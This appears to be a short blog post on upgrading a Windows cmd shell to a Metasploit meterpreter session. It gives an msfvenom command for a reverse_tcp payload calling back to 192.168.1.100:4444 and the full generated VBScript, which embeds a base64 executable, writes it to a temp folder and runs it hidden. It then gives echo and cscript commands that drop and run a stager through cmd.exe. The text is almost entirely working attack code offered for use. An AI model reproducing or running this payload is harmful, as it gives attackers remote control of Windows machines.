Metasploit - spawn a cmd shell into meterpreter

generate vbs payload with metasploit

./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 EXITFUNC=thread -f vbs --arch x86 --platform win
No encoder or badchars specified, outputting raw payload
Payload size: 354 bytes
Final size of vbs file: 7367 bytes
Function XDmseqKKgLL(RaXAxrQJt)
        JkpqFuIzrRSDizs = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
                "dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
                RaXAxrQJt & "</B64DECODE>"
        Set FYnAHpym = CreateObject("MSXML2.DOMDocument.3.0")
        FYnAHpym.LoadXML(JkpqFuIzrRSDizs)
        XDmseqKKgLL = FYnAHpym.selectsinglenode("B64DECODE").nodeTypedValue
        set FYnAHpym = nothing
End Function

Function WXvWzaYPVSvi()
        VJrNNDEIZ = "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"
        Dim mRZGIMWGqmBwV
        Set mRZGIMWGqmBwV = CreateObject("Scripting.FileSystemObject")
        Dim KPnCEhjzrx
        Dim VkyaCLQrQ
        Set KPnCEhjzrx = mRZGIMWGqmBwV.GetSpecialFolder(2)
        VkyaCLQrQ = KPnCEhjzrx & "\" & mRZGIMWGqmBwV.GetTempName()
        mRZGIMWGqmBwV.CreateFolder(VkyaCLQrQ)
        QVajSRIPEP = VkyaCLQrQ & "\" & "tbFMuqjIpttLFTq.exe"
        Dim cxndUGESKh
        Set cxndUGESKh = CreateObject("Wscript.Shell")
        kbPvrJTGyTjCY = XDmseqKKgLL(VJrNNDEIZ)
        Set bBasiTxKT = CreateObject("ADODB.Stream")
        bBasiTxKT.Type = 1
        bBasiTxKT.Open
        bBasiTxKT.Write kbPvrJTGyTjCY
        bBasiTxKT.SaveToFile QVajSRIPEP, 2
        cxndUGESKh.run QVajSRIPEP, 0, true
        mRZGIMWGqmBwV.DeleteFile(QVajSRIPEP)
        mRZGIMWGqmBwV.DeleteFolder(VkyaCLQrQ)
End Function

WXvWzaYPVSvi

upload run.vbs to server with cmd.exe

echo shellcode = WScript.Arguments.Item(0):strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > %TEMP%\test.vbs

Run payload

cscript.exe %TEMP%\test.vbs <msf-vbs-shellcode>

cmd to meterpreter

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值